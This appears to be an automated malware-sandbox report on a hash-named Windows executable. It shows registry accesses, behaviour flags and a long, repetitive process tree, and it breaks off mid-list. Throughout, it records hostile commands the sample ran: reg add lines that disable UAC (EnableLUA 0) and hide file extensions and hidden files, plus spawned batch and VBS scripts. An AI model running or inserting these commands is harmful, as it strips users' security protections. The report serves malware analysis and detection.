| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe | N/A |
Modifies registry key
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\nUkEsQoc\TecsYMkQ.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
"C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe"
C:\Users\Admin\nUkEsQoc\TecsYMkQ.exe
"C:\Users\Admin\nUkEsQoc\TecsYMkQ.exe"
C:\ProgramData\EMkwoYcY\KSkkUMoA.exe
"C:\ProgramData\EMkwoYcY\KSkkUMoA.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\xqIMcsMo.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\fcMUYEwk.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nSoUIUUw.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\CasscIYI.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\gMcMYUYw.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\eagkMYcs.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\MskEQcAM.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\MKwUIEgQ.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\jiccgQsY.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\ROYQQUAQ.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\zKsIUIYE.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\lKowockw.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\KQswYQcU.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\KmAcYIIM.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\YAUsoMMw.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\owYkgUcA.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\sAYAkwgE.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\vuAEIMgU.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\zmoccsMo.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
